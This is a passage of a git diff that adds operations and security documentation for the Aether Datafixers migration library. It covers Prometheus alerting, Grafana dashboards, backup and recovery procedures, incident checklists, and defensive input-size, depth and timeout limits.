+| `aether.datafixers.migrations.version.span` | Distribution | `domain` | avg > 50 | Version distance | + +All metrics use the prefix `aether.datafixers.migrations`. + +--- + +## Metric Details + +### Success Counter + +Tracks total successful migrations per domain. + +**Prometheus format:** +``` +aether_datafixers_migrations_success_total{domain="game"} 1234 +``` + +**Use cases:** +- Calculate success rate +- Monitor throughput +- Track migration activity + +### Failure Counter + +Tracks failed migrations with error type breakdown. + +**Prometheus format:** +``` +aether_datafixers_migrations_failure_total{domain="game",error_type="FixException"} 5 +aether_datafixers_migrations_failure_total{domain="game",error_type="DecodeException"} 2 +``` + +**Tags:** +- `domain` — DataFixer domain name +- `error_type` — Exception class simple name + +### Duration Timer + +Tracks execution time distribution (includes both success and failure). + +**Prometheus format:** +``` +aether_datafixers_migrations_duration_seconds_count{domain="game"} 1239 +aether_datafixers_migrations_duration_seconds_sum{domain="game"} 185.7 +aether_datafixers_migrations_duration_seconds_bucket{domain="game",le="0.01"} 500 +aether_datafixers_migrations_duration_seconds_bucket{domain="game",le="0.1"} 1100 +aether_datafixers_migrations_duration_seconds_bucket{domain="game",le="1.0"} 1230 +aether_datafixers_migrations_duration_seconds_bucket{domain="game",le="+Inf"} 1239 +``` + +### Version Span Distribution + +Tracks the distance between source and target versions (indicates data age). + +**Prometheus format:** +``` +aether_datafixers_migrations_version_span_count{domain="game"} 1234 +aether_datafixers_migrations_version_span_sum{domain="game"} 45600 +aether_datafixers_migrations_version_span_max{domain="game"} 150 +``` + +--- + +## Recommended Alert Thresholds + +### Critical Alerts (Page On-Call) + +| Alert | Condition | Duration | Action | +|------------------------|---------------------|----------|-------------------------| +| High Failure Rate | > 5% failures | 5m | Immediate investigation | +| All Migrations Failing | 100% failure rate | 2m | Emergency response | +| Service Down | No metrics reported | 5m | Check service health | + +### Warning Alerts (Notify Team) + +| Alert | Condition | Duration | Action | +|-----------------------|---------------|----------|-----------------------------------| +| Elevated Failure Rate | > 1% failures | 5m | Investigate during business hours | +| Slow Migrations | p95 > 1s | 5m | Performance review | +| Very Slow Migrations | p99 > 5s | 5m | Profile and optimize | + +### Informational Alerts (Dashboard/Log) + +| Alert | Condition | Duration | Action | +|--------------------|----------------|----------|-----------------------------| +| Large Version Span | avg span > 50 | 1h | Review data freshness | +| Very Large Span | max span > 200 | 1h | Identify stale data sources | +| No Activity | 0 migrations | 1h | Verify expected behavior | + +--- + +## Prometheus Alert Rules + +### Complete Alert Configuration + +```yaml +groups: + - name: aether-datafixers-critical + rules: + # High failure rate - immediate attention + - alert: DataFixerHighFailureRate + expr: | + ( + sum(rate(aether_datafixers_migrations_failure_total[5m])) by (domain) + / ( + sum(rate(aether_datafixers_migrations_success_total[5m])) by (domain) + + sum(rate(aether_datafixers_migrations_failure_total[5m])) by (domain) + ) + ) > 0.05 + for: 5m + labels: + severity: critical + annotations: + summary: "Critical: DataFixer failure rate > 5% in domain {{ $labels.domain }}" + description: "Failure rate is {{ $value | humanizePercentage }}. Check error logs and metrics." + runbook_url: "https://docs.example.com/runbooks/datafixer-high-failure" + + # All migrations failing + - alert: DataFixerAllFailing + expr: | + sum(rate(aether_datafixers_migrations_success_total[2m])) by (domain) == 0 + and sum(rate(aether_datafixers_migrations_failure_total[2m])) by (domain) > 0 + for: 2m + labels: + severity: critical + annotations: + summary: "Critical: All migrations failing in domain {{ $labels.domain }}" + description: "Zero successful migrations with active failures. Immediate attention required." + runbook_url: "https://docs.example.com/runbooks/datafixer-total-failure" + + - name: aether-datafixers-warning + rules: + # Elevated failure rate + - alert: DataFixerElevatedFailureRate + expr: | + ( + sum(rate(aether_datafixers_migrations_failure_total[5m])) by (domain) + / ( + sum(rate(aether_datafixers_migrations_success_total[5m])) by (domain) + + sum(rate(aether_datafixers_migrations_failure_total[5m])) by (domain) + ) + ) > 0.01 + for: 5m + labels: + severity: warning + annotations: + summary: "Warning: DataFixer failure rate > 1% in domain {{ $labels.domain }}" + description: "Failure rate is {{ $value | humanizePercentage }}. Investigate soon." + + # Slow migrations (p95) + - alert: DataFixerSlowMigrations + expr: | + histogram_quantile(0.95, + sum(rate(aether_datafixers_migrations_duration_seconds_bucket[5m])) by (le, domain) + ) > 1 + for: 5m + labels: + severity: warning + annotations: + summary: "Warning: Slow migrations in domain {{ $labels.domain }}" + description: "p95 migration duration is {{ $value | humanizeDuration }}. Review performance." + + # Very slow migrations (p99) + - alert: DataFixerVerySlowMigrations + expr: | + histogram_quantile(0.99, + sum(rate(aether_datafixers_migrations_duration_seconds_bucket[5m])) by (le, domain) + ) > 5 + for: 5m + labels: + severity: warning + annotations: + summary: "Warning: Very slow migrations in domain {{ $labels.domain }}" + description: "p99 migration duration is {{ $value | humanizeDuration }}. Profile and optimize." + + - name: aether-datafixers-info + rules: + # Large version span + - alert: DataFixerLargeVersionSpan + expr: | + ( + rate(aether_datafixers_migrations_version_span_sum[1h]) + / rate(aether_datafixers_migrations_version_span_count[1h]) + ) > 50 + for: 1h + labels: + severity: info + annotations: + summary: "Info: Large version span in domain {{ $labels.domain }}" + description: "Average span is {{ $value }} versions. Consider data freshness review." + + # No migration activity + - alert: DataFixerNoActivity + expr: | + sum(rate(aether_datafixers_migrations_success_total[1h])) by (domain) == 0 + and sum(rate(aether_datafixers_migrations_failure_total[1h])) by (domain) == 0 + for: 1h + labels: + severity: info + annotations: + summary: "Info: No migration activity in domain {{ $labels.domain }}" + description: "No migrations in the last hour. Verify this is expected." +``` + +--- + +## Grafana Dashboard + +### Complete Dashboard JSON + +```json +{ + "title": "Aether DataFixers Operations", + "uid": "aether-datafixers-ops", + "tags": ["aether", "datafixers", "migrations"], + "timezone": "browser", + "refresh": "30s", + "panels": [ + { + "title": "Migration Rate", + "type": "timeseries", + "gridPos": {"h": 8, "w": 12, "x": 0, "y": 0}, + "targets": [ + { + "expr": "sum(rate(aether_datafixers_migrations_success_total[5m])) by (domain)", + "legendFormat": "Success ({{domain}})" + }, + { + "expr": "sum(rate(aether_datafixers_migrations_failure_total[5m])) by (domain)", + "legendFormat": "Failure ({{domain}})" + } + ], + "fieldConfig": { + "defaults": { + "unit": "ops" + } + } + }, + { + "title": "Success Rate", + "type": "gauge", + "gridPos": {"h": 8, "w": 6, "x": 12, "y": 0}, + "targets": [ + { + "expr": "(sum(rate(aether_datafixers_migrations_success_total[1h])) / (sum(rate(aether_datafixers_migrations_success_total[1h])) + sum(rate(aether_datafixers_migrations_failure_total[1h])))) * 100" + } + ], + "fieldConfig": { + "defaults": { + "unit": "percent", + "min": 0, + "max": 100, + "thresholds": { + "steps": [ + {"color": "red", "value": 0}, + {"color": "yellow", "value": 95}, + {"color": "green", "value": 99} + ] + } + } + } + }, + { + "title": "Current Error Rate", + "type": "stat", + "gridPos": {"h": 8, "w": 6, "x": 18, "y": 0}, + "targets": [ + { + "expr": "sum(rate(aether_datafixers_migrations_failure_total[5m])) / (sum(rate(aether_datafixers_migrations_success_total[5m])) + sum(rate(aether_datafixers_migrations_failure_total[5m]))) * 100" + } + ], + "fieldConfig": { + "defaults": { + "unit": "percent", + "thresholds": { + "steps": [ + {"color": "green", "value": 0}, + {"color": "yellow", "value": 1}, + {"color": "red", "value": 5} + ] + } + } + } + }, + { + "title": "Migration Duration Percentiles", + "type": "timeseries", + "gridPos": {"h": 8, "w": 12, "x": 0, "y": 8}, + "targets": [ + { + "expr": "histogram_quantile(0.50, sum(rate(aether_datafixers_migrations_duration_seconds_bucket[5m])) by (le, domain))", + "legendFormat": "p50 ({{domain}})" + }, + { + "expr": "histogram_quantile(0.95, sum(rate(aether_datafixers_migrations_duration_seconds_bucket[5m])) by (le, domain))", + "legendFormat": "p95 ({{domain}})" + }, + { + "expr": "histogram_quantile(0.99, sum(rate(aether_datafixers_migrations_duration_seconds_bucket[5m])) by (le, domain))", + "legendFormat": "p99 ({{domain}})" + } + ], + "fieldConfig": { + "defaults": { + "unit": "s" + } + } + }, + { + "title": "Version Span Distribution", + "type": "timeseries", + "gridPos": {"h": 8, "w": 12, "x": 12, "y": 8}, + "targets": [ + { + "expr": "rate(aether_datafixers_migrations_version_span_sum[5m]) / rate(aether_datafixers_migrations_version_span_count[5m])", + "legendFormat": "Avg Span ({{domain}})" + }, + { + "expr": "aether_datafixers_migrations_version_span_max", + "legendFormat": "Max Span ({{domain}})" + } + ] + }, + { + "title": "Failures by Error Type", + "type": "piechart", + "gridPos": {"h": 8, "w": 8, "x": 0, "y": 16}, + "targets": [ + { + "expr": "sum(increase(aether_datafixers_migrations_failure_total[24h])) by (error_type)", + "legendFormat": "{{error_type}}" + } + ] + }, + { + "title": "Failure Rate by Domain", + "type": "timeseries", + "gridPos": {"h": 8, "w": 8, "x": 8, "y": 16}, + "targets": [ + { + "expr": "sum(rate(aether_datafixers_migrations_failure_total[5m])) by (domain)", + "legendFormat": "{{domain}}" + } + ], + "fieldConfig": { + "defaults": { + "unit": "ops" + } + } + }, + { + "title": "Recent Errors (Last 1h)", + "type": "table", + "gridPos": {"h": 8, "w": 8, "x": 16, "y": 16}, + "targets": [ + { + "expr": "sum(increase(aether_datafixers_migrations_failure_total[1h])) by (domain, error_type) > 0", + "format": "table", + "instant": true + } + ], + "transformations": [ + { + "id": "organize", + "options": { + "renameByName": { + "domain": "Domain", + "error_type": "Error Type", + "Value": "Count" + } + } + } + ] + } + ] +} +``` + +### Dashboard Import + +1. Go to Grafana > Dashboards > Import +2. Paste the JSON above +3. Select your Prometheus data source +4. Click Import + +--- + +## Actuator Integration + +### Health Endpoint + +The DataFixer health indicator reports UP/DOWN status per domain. + +**Request:** +```bash +curl http://localhost:8080/actuator/health +``` + +**Response:** +```json +{ + "status": "UP", + "components": { + "datafixer": { + "status": "UP", + "details": { + "totalDomains": 2, + "default.status": "UP", + "default.currentVersion": 200, + "game.status": "UP", + "game.currentVersion": 150 + } + } + } +} +``` + +### Custom Endpoint + +Get detailed DataFixer information at `/actuator/datafixers`: + +```bash +curl http://localhost:8080/actuator/datafixers +``` + +```json +{ + "domains": { + "default": { + "currentVersion": 200, + "status": "UP" + }, + "game": { + "currentVersion": 150, + "status": "UP" + } + } +} +``` + +### Kubernetes Probes + +```yaml +apiVersion: v1 +kind: Pod +spec: + containers: + - name: app + livenessProbe: + httpGet: + path: /actuator/health/liveness + port: 8080 + initialDelaySeconds: 30 + periodSeconds: 10 + failureThreshold: 3 + + readinessProbe: + httpGet: + path: /actuator/health/readiness + port: 8080 + initialDelaySeconds: 10 + periodSeconds: 5 + failureThreshold: 3 + + startupProbe: + httpGet: + path: /actuator/health + port: 8080 + initialDelaySeconds: 5 + periodSeconds: 5 + failureThreshold: 30 +``` + +### Prometheus Scraping Actuator + +```yaml +# prometheus.yml +scrape_configs: + - job_name: 'spring-actuator' + metrics_path: '/actuator/prometheus' + static_configs: + - targets: ['app:8080'] + scrape_interval: 15s +``` + +--- + +## Multi-Domain Monitoring + +### Per-Domain Dashboards + +Use Grafana variables to filter by domain: + +```json +{ + "templating": { + "list": [ + { + "name": "domain", + "type": "query", + "query": "label_values(aether_datafixers_migrations_success_total, domain)", + "refresh": 2 + } + ] + } +} +``` + +Then use `domain=~\"$domain\"` in queries: + +```promql +sum(rate(aether_datafixers_migrations_success_total{domain=~"$domain"}[5m])) +``` + +### Cross-Domain Comparison + +Compare performance across domains: + +```promql +# Success rate by domain +( + sum(rate(aether_datafixers_migrations_success_total[1h])) by (domain) + / ( + sum(rate(aether_datafixers_migrations_success_total[1h])) by (domain) + + sum(rate(aether_datafixers_migrations_failure_total[1h])) by (domain) + ) +) * 100 +``` + +--- + +## PagerDuty Integration + +### Alertmanager Configuration + +```yaml +# alertmanager.yml +global: + pagerduty_url: 'https://events.pagerduty.com/v2/enqueue' + +route: + receiver: 'default' + routes: + - match: + severity: critical + receiver: 'pagerduty-critical' + - match: + severity: warning + receiver: 'slack-warning' + +receivers: + - name: 'default' + email_configs: + - to: 'team@example.com' + + - name: 'pagerduty-critical' + pagerduty_configs: + - service_key: '' + description: '{{ .CommonAnnotations.summary }}' + details: + runbook: '{{ .CommonAnnotations.runbook_url }}' + domain: '{{ .CommonLabels.domain }}' + + - name: 'slack-warning' + slack_configs: + - api_url: '' + channel: '#alerts' + title: '{{ .CommonAnnotations.summary }}' + text: '{{ .CommonAnnotations.description }}' +``` + +--- + +## Application Configuration + +### Enable Metrics + +```yaml +# application.yml +aether: + datafixers: + enabled: true + metrics: + timing: true + counting: true + +management: + endpoints: + web: + exposure: + include: health, info, prometheus, datafixers + metrics: + export: + prometheus: + enabled: true + endpoint: + health: + show-details: always +``` + +### Custom Metrics Extension + +```java +@Component +public class ExtendedMigrationMetrics extends MigrationMetrics { + + private final Counter largeSpanCounter; + + public ExtendedMigrationMetrics(MeterRegistry registry) { + super(registry); + this.largeSpanCounter = Counter.builder("aether.datafixers.migrations.large_span") + .description("Migrations with version span > 100") + .register(registry); + } + + @Override + public void recordSuccess(String domain, int fromVersion, int toVersion, Duration duration) { + super.recordSuccess(domain, fromVersion, toVersion, duration); + + // Track large version spans separately + if (Math.abs(toVersion - fromVersion) > 100) { + largeSpanCounter.increment(); + } + } +} +``` + +--- + +## Related + +- [Spring Boot Metrics](../spring-boot/metrics.md) — Complete metrics reference +- [Spring Boot Actuator](../spring-boot/actuator.md) — Actuator integration +- [Debugging Guide](debugging-guide.md) — Diagnosing issues +- [Recovery Procedures](recovery-procedures.md) — Responding to alerts diff --git a/docs/operations/recovery-procedures.md b/docs/operations/recovery-procedures.md new file mode 100644 index 0000000..43b5eac --- /dev/null +++ b/docs/operations/recovery-procedures.md @@ -0,0 +1,583 @@ +# Recovery Procedures + +How to recover from migration failures, data issues, and production incidents. + +## Quick Reference + +| Scenario | Procedure | Complexity | +|--------------------------|------------------------|------------| +| Single record failure | Retry with diagnostics | Low | +| Batch failure (< 5%) | Isolate and retry | Medium | +| High failure rate (> 5%) | Stop, investigate, fix | High | +| Data corruption | Restore from backup | High | +| Schema mismatch | Version alignment | Medium | + +--- + +## Backup Recommendations + +### Pre-Migration Backup Strategy + +**Before major version bumps:** +1. Create full database backup +2. Verify backup integrity (test restore) +3. Document current schema version +4. Keep backup for rollback window (e.g., 7 days) + +**Before routine operations:** +1. Enable point-in-time recovery +2. Verify incremental backups are current +3. Document migration batch parameters + +### Backup Checklist + +```markdown +## Pre-Migration Backup Checklist + +- [ ] Database backup completed +- [ ] Backup verified (test restore on staging) +- [ ] Backup retention policy confirmed +- [ ] Schema version documented in backup metadata +- [ ] Rollback procedure documented +- [ ] Team notified of migration window +``` + +### Database Backup Patterns + +**PostgreSQL:** +```bash +# Full backup before migration +pg_dump -Fc -f backup_v100_$(date +%Y%m%d).dump mydb + +# With version in filename +pg_dump -Fc -f backup_schema_v100_to_v200_$(date +%Y%m%d_%H%M%S).dump mydb +``` + +**MongoDB:** +```bash +# Full backup +mongodump --db mydb --out ./backup_v100_$(date +%Y%m%d) + +# Specific collection +mongodump --db mydb --collection players --out ./backup_players_v100 +``` + +### Application-Level Snapshots + +```java +// Create pre-migration snapshot for critical records +public void createMigrationSnapshot(List recordIds) { + Path snapshotDir = Path.of("snapshots", + "migration_" + System.currentTimeMillis()); + Files.createDirectories(snapshotDir); + + for (String id : recordIds) { + Dynamic data = loadRecord(id); + Path file = snapshotDir.resolve(id + ".json"); + Files.writeString(file, serializeToJson(data)); + } + + logger.info("Created snapshot of {} records at {}", + recordIds.size(), snapshotDir); +} +``` + +--- + +## Partial Migration Recovery + +### Detecting Partial Migrations + +**Symptoms:** +- Some records at old version, some at new version +- Inconsistent data across related entities +- `aether.datafixers.migrations.failure` spike followed by recovery + +**Detection Query (SQL):** +```sql +-- Find version distribution +SELECT data_version, COUNT(*) as count +FROM entities +WHERE type = 'player' +GROUP BY data_version +ORDER BY data_version; + +-- Find records still at old version +SELECT id, data_version, updated_at +FROM entities +WHERE type = 'player' + AND data_version < 200 +ORDER BY updated_at DESC; +``` + +**Detection Query (MongoDB):** +```javascript +// Version distribution +db.entities.aggregate([ + { $match: { type: "player" } }, + { $group: { _id: "$dataVersion", count: { $sum: 1 } } }, + { $sort: { _id: 1 } } +]); + +// Records at old version +db.entities.find({ + type: "player", + dataVersion: { $lt: 200 } +}).sort({ updatedAt: -1 }); +``` + +### Recovery Option 1: Retry Failed Records + +Best for: Small number of failures, transient errors. + +```java +public class MigrationRetryService { + + private final AetherDataFixer fixer; + private final Logger logger = LoggerFactory.getLogger(getClass()); + + public void retryFailedRecords(List failedIds, int targetVersion) { + int success = 0; + int failed = 0; + + for (String id : failedIds) { + try { + // Load record + Dynamic data = loadRecord(id); + int currentVersion = extractVersion(data); + + // Skip if already migrated + if (currentVersion >= targetVersion) { + logger.info("Record {} already at version {}", id, currentVersion); + continue; + } + + // Enable diagnostics for retry + DiagnosticContext ctx = DiagnosticContext.create( + DiagnosticOptions.builder() + .captureSnapshots(true) + .build() + ); + + // Retry migration + Dynamic result = fixer.update( + TypeReferences.PLAYER, + data, + new DataVersion(currentVersion), + new DataVersion(targetVersion), + ctx + ); + + // Save result + saveRecord(id, result); + success++; + + } catch (DataFixerException e) { + failed++; + logger.error("Retry failed for record {}: {} [{}]", + id, e.getMessage(), e.getContext()); + } + } + + logger.info("Retry complete: {} success, {} failed", success, failed); + } +} +``` + +### Recovery Option 2: Isolate and Skip + +Best for: Specific data patterns causing failures. + +```java +public class MigrationIsolationService { + + public void migrateWithIsolation(Stream> records, int targetVersion) { + List quarantined = new ArrayList<>(); + + records.forEach(data -> { + String id = extractId(data); + try { + Dynamic result = fixer.update( + TypeReferences.PLAYER, + data, + extractVersion(data), + targetVersion + ); + saveRecord(id, result); + } catch (DataFixerException e) { + // Quarantine failed record + quarantined.add(id); + saveToQuarantine(id, data, e); + logger.warn("Quarantined record {}: {}", id, e.getMessage()); + } + }); + + if (!quarantined.isEmpty()) { + logger.warn("Migration complete with {} quarantined records", quarantined.size()); + notifyTeam(quarantined); + } + } + + private void saveToQuarantine(String id, Dynamic data, DataFixerException e) { + // Save to quarantine table/collection for manual review + QuarantineRecord record = new QuarantineRecord( + id, + serializeToJson(data), + e.getClass().getSimpleName(), + e.getMessage(), + e.getContext(), + Instant.now() + ); + quarantineRepository.save(record); + } +} +``` + +### Recovery Option 3: Manual Intervention + +Best for: Complex data issues requiring human judgment. + +```java +public class ManualRecoveryService { + + public void exportForManualReview(List recordIds) { + Path exportDir = Path.of("manual_review", + LocalDate.now().toString()); + Files.createDirectories(exportDir); + + for (String id : recordIds) { + Dynamic data = loadRecord(id); + + // Export with metadata + Map export = new LinkedHashMap<>(); + export.put("id", id); + export.put("currentVersion", extractVersion(data)); + export.put("targetVersion", CURRENT_VERSION); + export.put("data", data.getValue()); + export.put("exportedAt", Instant.now().toString()); + + Path file = exportDir.resolve(id + ".json"); + Files.writeString(file, prettyJson(export)); + } + + logger.info("Exported {} records to {} for manual review", + recordIds.size(), exportDir); + } + + public void importManualFixes(Path fixesDir) { + try (Stream files = Files.list(fixesDir)) { + files.filter(p -> p.toString().endsWith(".json")) + .forEach(file -> { + try { + Map fixed = parseJson(Files.readString(file)); + String id = (String) fixed.get("id"); + Object data = fixed.get("data"); + int version = ((Number) fixed.get("fixedVersion")).intValue(); + + saveRecord(id, createDynamic(data, version)); + logger.info("Imported manual fix for record {}", id); + } catch (Exception e) { + logger.error("Failed to import {}: {}", file, e.getMessage()); + } + }); + } + } +} +``` + +--- + +## Rollback Strategies + +### Important: Forward-Only Design + +Aether Datafixers is designed for **forward migration only**. True rollback requires: + +1. **Restore from backup** (recommended) +2. **Write compensating fixes** (complex, not recommended) + +### Restore from Backup + +**Full Restore:** + +```bash +# PostgreSQL +pg_restore -d mydb backup_v100_20240115.dump + +# MongoDB +mongorestore --db mydb ./backup_v100_20240115/mydb +``` + +**Selective Restore (specific records):** + +```sql +-- PostgreSQL: Restore specific records from backup +-- 1. Restore backup to temporary schema +CREATE SCHEMA backup_restore; +pg_restore -d mydb -n backup_restore backup_v100.dump + +-- 2. Copy specific records +INSERT INTO entities (id, type, data, data_version) +SELECT id, type, data, data_version +FROM backup_restore.entities +WHERE id IN ('record1', 'record2', 'record3') +ON CONFLICT (id) DO UPDATE +SET data = EXCLUDED.data, data_version = EXCLUDED.data_version; + +-- 3. Clean up +DROP SCHEMA backup_restore CASCADE; +``` + +### Compensating Fixes (Advanced) + +Only use when backup is unavailable and you understand the exact transformations to reverse. + +```java +// Example: Reverse a field rename (name -> displayName back to name) +public class ReverseRenameDisplayNameFix extends SchemaDataFix { + + public ReverseRenameDisplayNameFix(Schema inputSchema, Schema outputSchema) { + super("reverse_rename_display_name", inputSchema, outputSchema); + } + + @Override + protected TypeRewriteRule makeRule(Schema inputSchema, Schema outputSchema) { + return Rules.renameField( + TypeReferences.PLAYER, + "displayName", // current name + "name" // original name + ); + } +} +``` + +**Warning:** Compensating fixes are error-prone. Prefer backup restoration. + +--- + +## Error Recovery Workflows + +### Workflow 1: FixException Recovery + +``` +1. Extract exception context + └─ Get fixName, fromVersion, toVersion, typeReference + +2. Enable DiagnosticContext + └─ captureSnapshots(true), captureRuleDetails(true) + +3. Reproduce with single record + └─ Run migration on isolated test record + +4. Analyze MigrationReport + └─ Check fix.beforeSnapshot vs fix.afterSnapshot + └─ Find exact rule that failed + +5. Identify root cause + ├─ Missing field? → Check input data + ├─ Wrong type? → Check codec/schema + └─ Logic error? → Check fix implementation + +6. Fix data or code + ├─ Data issue → Clean/transform data + └─ Code issue → Deploy fix, redeploy + +7. Retry migration + └─ Process failed records +``` + +### Workflow 2: DecodeException Recovery + +``` +1. Get path from exception + └─ e.getPath() returns "player.inventory[0].item" + +2. Navigate to problematic field + └─ Use path to find exact location in data + +3. Determine expected vs actual type + └─ Check schema definition + └─ Compare with actual data + +4. Clean/transform data + ├─ Missing field? → Add default value + ├─ Wrong type? → Convert or remove + └─ Malformed? → Parse and fix + +5. Retry migration +``` + +### Workflow 3: RegistryException Recovery + +``` +1. Check missing type/version + └─ e.getMissingType() or e.getMissingVersion() + +2. Verify bootstrap registration + └─ Check DataFixerBootstrap implementation + +3. Check version chain completeness + └─ Ensure no gaps in version sequence + +4. Add missing registrations + └─ Register missing type or schema + +5. Redeploy and retry +``` + +--- + +## Incident Response + +### Severity Levels + +| Level | Criteria | Response Time | Escalation | +|-------|----------|---------------|------------| +| P1 | All migrations failing | Immediate | On-call + Lead + Manager | +| P2 | > 5% failure rate | 15 min | On-call + Lead | +| P3 | > 1% failure rate | 1 hour | On-call | +| P4 | Isolated failures | 4 hours | Next business day | + +### Incident Response Checklist + +#### Initial Response (0-5 min) + +```markdown +## Initial Response Checklist + +- [ ] Acknowledge alert +- [ ] Check metrics dashboard + - Current failure rate + - Error type breakdown + - Affected domains +- [ ] Review recent deployments (last 24h) +- [ ] Check actuator health endpoint +- [ ] Initial assessment posted to incident channel +``` + +#### Investigation (5-30 min) + +```markdown +## Investigation Checklist + +- [ ] Enable DEBUG logging for de.splatgames.aether.datafixers +- [ ] Capture sample failures (3-5 records) +- [ ] Enable DiagnosticContext on sample records +- [ ] Analyze MigrationReport for patterns +- [ ] Check database/storage health +- [ ] Check upstream service health +- [ ] Root cause hypothesis documented +``` + +#### Resolution + +```markdown +## Resolution Checklist + +- [ ] Root cause confirmed +- [ ] Fix identified + - [ ] Data fix (transformation/cleanup) + - [ ] Code fix (bug fix) + - [ ] Configuration fix (settings change) +- [ ] Fix tested in staging +- [ ] Fix deployed to production +- [ ] Metrics returning to normal +- [ ] Failed records reprocessed +``` + +#### Post-Incident + +```markdown +## Post-Incident Checklist + +- [ ] Timeline documented +- [ ] Root cause analysis complete +- [ ] Post-mortem scheduled (within 48h) +- [ ] Runbook updated if needed +- [ ] Preventive measures identified +- [ ] Follow-up tasks created +``` + +--- + +## Data Validation After Recovery + +### Consistency Checks + +```sql +-- Check for version consistency +SELECT + type, + MIN(data_version) as min_version, + MAX(data_version) as max_version, + COUNT(*) as count +FROM entities +GROUP BY type; + +-- Check for orphaned references +SELECT e.id, e.type +FROM entities e +LEFT JOIN entities parent ON e.parent_id = parent.id +WHERE e.parent_id IS NOT NULL AND parent.id IS NULL; +``` + +### Version Alignment + +```java +public void verifyVersionAlignment(int expectedVersion) { + // Count records at wrong version + long wrongVersion = entityRepository.countByDataVersionNot(expectedVersion); + + if (wrongVersion > 0) { + logger.error("Found {} records at wrong version (expected {})", + wrongVersion, expectedVersion); + + // List samples + List samples = entityRepository + .findByDataVersionNot(expectedVersion, PageRequest.of(0, 10)); + + for (Entity e : samples) { + logger.error(" {} at version {} (expected {})", + e.getId(), e.getDataVersion(), expectedVersion); + } + } else { + logger.info("All records at expected version {}", expectedVersion); + } +} +``` + +### Functional Verification + +```java +@Test +void verifyMigrationSuccess() { + // Load sample migrated records + List samples = entityRepository.findRandomSample(100); + + for (Entity entity : samples) { + // Verify can decode at current version + assertDoesNotThrow(() -> { + Typed typed = fixer.decode( + CURRENT_VERSION, + entity.getTypeReference(), + entity.getData() + ); + assertNotNull(typed.getValue()); + }, "Failed to decode entity " + entity.getId()); + + // Verify key fields present + Dynamic data = entity.getData(); + assertTrue(data.get("id").asString().result().isPresent()); + assertTrue(data.get("_version").asNumber().result().isPresent()); + } +} +``` + +--- + +## Related + +- [Error Scenarios](error-scenarios.md) — Exception handling reference +- [Debugging Guide](debugging-guide.md) — Diagnosing issues +- [Monitoring & Alerting](monitoring-alerting.md) — Detecting problems +- [Troubleshooting](../troubleshooting/index.md) — Quick fixes diff --git a/docs/security/best-practices.md b/docs/security/best-practices.md new file mode 100644 index 0000000..dc04f4a --- /dev/null +++ b/docs/security/best-practices.md @@ -0,0 +1,492 @@ +# Security Best Practices + +This document provides general security best practices for processing untrusted data with Aether Datafixers. These practices apply across all serialization formats. + +## Defense in Depth + +Security should be implemented in layers. No single control is sufficient—combine multiple measures: + +1. **Input Validation** — Check size and format before parsing +2. **Safe Parser Configuration** — Use security-hardened parser settings +3. **Resource Limits** — Enforce depth, size, and time limits +4. **Monitoring** — Log and alert on suspicious activity +5. **Sandboxing** — Isolate high-risk processing + +--- + +## Input Validation Before Migration + +### Size Validation + +Always validate input size before parsing: + +```java +public class InputValidator { + + private static final long MAX_PAYLOAD_SIZE = 10 * 1024 * 1024; // 10MB + + public void validateSize(byte[] input) { + if (input == null) { + throw new IllegalArgumentException("Input cannot be null"); + } + if (input.length > MAX_PAYLOAD_SIZE) { + throw new PayloadTooLargeException( + "Payload size " + input.length + " exceeds maximum " + MAX_PAYLOAD_SIZE); + } + } + + public void validateSize(String input) { + if (input == null) { + throw new IllegalArgumentException("Input cannot be null"); + } + if (input.length() > MAX_PAYLOAD_SIZE) { + throw new PayloadTooLargeException( + "Payload size " + input.length() + " exceeds maximum " + MAX_PAYLOAD_SIZE); + } + } + + public void validateSize(InputStream input, long contentLength) { + if (contentLength > MAX_PAYLOAD_SIZE) { + throw new PayloadTooLargeException( + "Content-Length " + contentLength + " exceeds maximum " + MAX_PAYLOAD_SIZE); + } + } +} +``` + +### Size-Limited InputStream + +For streaming scenarios, wrap the input stream: + +```java +public class SizeLimitedInputStream extends FilterInputStream { + + private final long maxSize; + private long bytesRead = 0; + + public SizeLimitedInputStream(InputStream in, long maxSize) { + super(in); + this.maxSize = maxSize; + } + + @Override + public int read() throws IOException { + int b = super.read(); + if (b != -1) { + bytesRead++; + checkLimit(); + } + return b; + } + + @Override + public int read(byte[] b, int off, int len) throws IOException { + int n = super.read(b, off, len); + if (n > 0) { + bytesRead += n; + checkLimit(); + } + return n; + } + + private void checkLimit() throws IOException { + if (bytesRead > maxSize) { + throw new IOException("Input exceeds maximum size of " + maxSize + " bytes"); + } + } +} + +// Usage +InputStream limited = new SizeLimitedInputStream(userInput, 10 * 1024 * 1024); +Object data = yaml.load(limited); +``` + +--- + +## Depth and Nesting Limits + +Deep nesting can cause stack overflow or excessive memory consumption. + +### Parser-Level Limits (Preferred) + +Use built-in parser limits when available: + +```java +// Jackson +StreamReadConstraints constraints = StreamReadConstraints.builder() + .maxNestingDepth(50) + .build(); + +// SnakeYAML +LoaderOptions options = new LoaderOptions(); +options.setNestingDepthLimit(50); +``` + +### Application-Level Validation + +For parsers without built-in limits, validate after parsing: + +```java +public class DepthValidator { + + private static final int MAX_DEPTH = 50; + + public void validateDepth(Dynamic dynamic) { + validateDepth(dynamic, 0); + } + + private void validateDepth(Dynamic dynamic, int depth) { + if (depth > MAX_DEPTH) { + throw new SecurityException("Data exceeds maximum depth of " + MAX_DEPTH); + } + + // Check map entries + dynamic.getMap().result().ifPresent(map -> { + map.values().forEach(value -> validateDepth(value, depth + 1)); + }); + + // Check list elements + dynamic.getList().result().ifPresent(list -> { + list.forEach(element -> validateDepth(element, depth + 1)); + }); + } +} +``` + +--- + +## Timeout Configuration + +Long-running migrations can be exploited for DoS. Implement timeouts: + +```java +import java.util.concurrent.*; + +public class TimedMigrationService { + + private final AetherDataFixer fixer; + private final ExecutorService executor; + private final Duration timeout; + + public TimedMigrationService(AetherDataFixer fixer, Duration timeout) { + this.fixer = fixer; + this.executor = Executors.newCachedThreadPool(); + this.timeout = timeout; + } + + public TaggedDynamic migrateWithTimeout( + TaggedDynamic input, + DataVersion from, + DataVersion to) throws TimeoutException { + + Future> future = executor.submit( + () -> fixer.update(input, from, to) + ); + + try { + return future.get(timeout.toMillis(), TimeUnit.MILLISECONDS); + } catch (TimeoutException e) { + future.cancel(true); + throw new MigrationTimeoutException( + "Migration timed out after " + timeout, e); + } catch (InterruptedException e) { + Thread.currentThread().interrupt(); + throw new MigrationException("Migration interrupted", e); + } catch (ExecutionException e) { + throw new MigrationException("Migration failed", e.getCause()); + } + } + + public void shutdown() { + executor.shutdown(); + } +} +``` + +### Virtual Threads (Java 21+) + +With Java 21+, use virtual threads for better resource efficiency: + +```java +public class VirtualThreadMigrationService { + + 